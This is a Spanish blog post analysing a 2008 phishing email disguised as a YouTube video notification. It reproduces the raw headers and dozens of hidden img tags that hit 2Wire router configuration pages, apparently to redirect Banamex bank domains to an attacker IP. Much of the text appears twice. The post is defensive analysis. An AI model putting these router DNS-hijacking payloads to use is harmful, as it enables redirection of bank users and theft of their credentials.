El dia de hoy, revisando los correos encuentro un correo de:
para revisar los mails de la empresa, uso pine un cliente de correo basado en texto el cual ejecuto desde la consola de comandos, me gusta porque es rápido y los comandos para borrar me permiten eliminar rápidamente aquellos que llegan por montones.
el correo en las primeras lineas era similar a los enviados por service@youtube.com pero al final del correo aparecían unas muy sospechosas lineas:
[xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt=]
[xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt=]
al revisar el archivo raw del correo, aparecieron muchas cosas mas:
Encabezado:
From nobody@palvelin1.ammuu.com Thu May 8 09:21:23 2008
X-UIDL: 7]Y!!7AW"!+;o"!Qgn"!
Return-Path:
X-Spam-Checker-Version: SpamAssassin 3.1.8 (2007-02-13) on chamba.com.mx
X-Spam-Level:
X-Spam-Status: No, score=-2.4 required=5.0 tests=BAYES_00,HTML_MESSAGE,
MIME_HTML_ONLY,NORMAL_HTTP_TO_IP autolearn=ham version=3.1.8
X-Original-To: yo.mero@chamba.com.mx
Delivered-To: yo.mero@chamba.com.mx
Received: from localhost (localhost [127.0.0.1])
by chamba.com.mx (Postfix) with ESMTP id 6981115074F
for; Thu, 8 May 2008 09:21:23 -0500 (CDT)
Received: from chamba.com.mx ([127.0.0.1])
by localhost (chamba.com.mx [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id 24642-10 for;
Thu, 8 May 2008 09:20:32 -0500 (CDT)
Received: from palvelin1.ammuu.com (palvelin1.ammuu.com [217.67.237.142])
by chamba.com.mx (Postfix) with ESMTP id E145E150770
for; Thu, 8 May 2008 09:20:27 -0500 (CDT)
Received: from nobody by palvelin1.ammuu.com with local (Exim 4.63)
(envelope-from)
id 1Ju6z3-0007jV-Cs
for yo.mero@chamba.com.mx; Thu, 08 May 2008 17:20:10 +0300
To: yo.mero@chamba.com.mx
Subject: carlosm34 te ha enviado un video
From: service@youtube.com
Reply-To: service@youtube.com
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id:
Date: Thu, 08 May 2008 17:20:10 +0300
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - palvelin1.ammuu.com
X-AntiAbuse: Original Domain - chamba.com.mx
X-AntiAbuse: Originator/Caller UID/GID - [99 500] / [47 12]
X-AntiAbuse: Sender Address Domain - palvelin1.ammuu.com
X-Source:
X-Source-Args: /usr/local/apache/bin/httpd -DSSL
X-Source-Dir: leffamaa.com:/public_html
X-Virus-Scanned: amavisd-new at chamba.com.mx
Status: RO
X-Status:
X-Keywords:
X-UID: 1247
Apariencia:
cadenas extrañas:
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com&ADDR=66.116.199.134 alt=">
Date: Thu, 08 May 2008 17:20:10 +0300
From: service@youtube.com
To: luis.perez
Subject: carlosm34 te ha enviado un video
para revisar los mails de la empresa, uso pine un cliente de correo basado en texto el cual ejecuto desde la consola de comandos, me gusta porque es rápido y los comandos para borrar me permiten eliminar rápidamente aquellos que llegan por montones.
el correo en las primeras lineas era similar a los enviados por service@youtube.com pero al final del correo aparecían unas muy sospechosas lineas:
[xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt=]
[xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt=]
al revisar el archivo raw del correo, aparecieron muchas cosas mas:
Encabezado:
From nobody@palvelin1.ammuu.com Thu May 8 09:21:23 2008
X-UIDL: 7]Y!!7AW"!+;o"!Qgn"!
Return-Path:
X-Spam-Checker-Version: SpamAssassin 3.1.8 (2007-02-13) on chamba.com.mx
X-Spam-Level:
X-Spam-Status: No, score=-2.4 required=5.0 tests=BAYES_00,HTML_MESSAGE,
MIME_HTML_ONLY,NORMAL_HTTP_TO_IP autolearn=ham version=3.1.8
X-Original-To: yo.mero@chamba.com.mx
Delivered-To: yo.mero@chamba.com.mx
Received: from localhost (localhost [127.0.0.1])
by chamba.com.mx (Postfix) with ESMTP id 6981115074F
for
Received: from chamba.com.mx ([127.0.0.1])
by localhost (chamba.com.mx [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id 24642-10 for
Thu, 8 May 2008 09:20:32 -0500 (CDT)
Received: from palvelin1.ammuu.com (palvelin1.ammuu.com [217.67.237.142])
by chamba.com.mx (Postfix) with ESMTP id E145E150770
for
Received: from nobody by palvelin1.ammuu.com with local (Exim 4.63)
(envelope-from
id 1Ju6z3-0007jV-Cs
for yo.mero@chamba.com.mx; Thu, 08 May 2008 17:20:10 +0300
To: yo.mero@chamba.com.mx
Subject: carlosm34 te ha enviado un video
From: service@youtube.com
Reply-To: service@youtube.com
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id:
Date: Thu, 08 May 2008 17:20:10 +0300
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - palvelin1.ammuu.com
X-AntiAbuse: Original Domain - chamba.com.mx
X-AntiAbuse: Originator/Caller UID/GID - [99 500] / [47 12]
X-AntiAbuse: Sender Address Domain - palvelin1.ammuu.com
X-Source:
X-Source-Args: /usr/local/apache/bin/httpd -DSSL
X-Source-Dir: leffamaa.com:/public_html
X-Virus-Scanned: amavisd-new at chamba.com.mx
Status: RO
X-Status:
X-Keywords:
X-UID: 1247
Apariencia:
YouTube Broadcast Yourself™
carlosm34 quiere compartir un video contigo.
Descripción del video
se aprecia la descomposicion lenta de una manzana aprecialo...
Mensaje personal
mira eso
Para aceptar la solicitud de mi amigo, haz clic aquí.
Para enviar una respuesta a carlosm34, haz clic aquí.
Gracias,
carlosm34
Uso de YouTube
Ayuda
de YouTube
Consulta en el Centro de ayuda respuestas
a preguntas habituales.
Configuración de tu cuenta
Para cambiar tus preferencias, la
configuración o la información personal, accede a la
sección "Mi cuenta".
Notificaciones por correo electrónico
Para cambiar o cancelar
las notificaciones por correo electrónico de YouTube, accede a la
sección "Opciones de correo electrónico" de tu perfil.
Notifica mensajes de correo electrónico spam
Si éste es un
mensaje de correo electrónico spam, notifícalo.© 2008 YouTube,
Inc.
cadenas extrañas:
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com.mx&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=66.116.199.134 alt="
img alt="" src="http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.boveda.banamex.com&ADDR=66.116.199.134 alt=">
Comentarios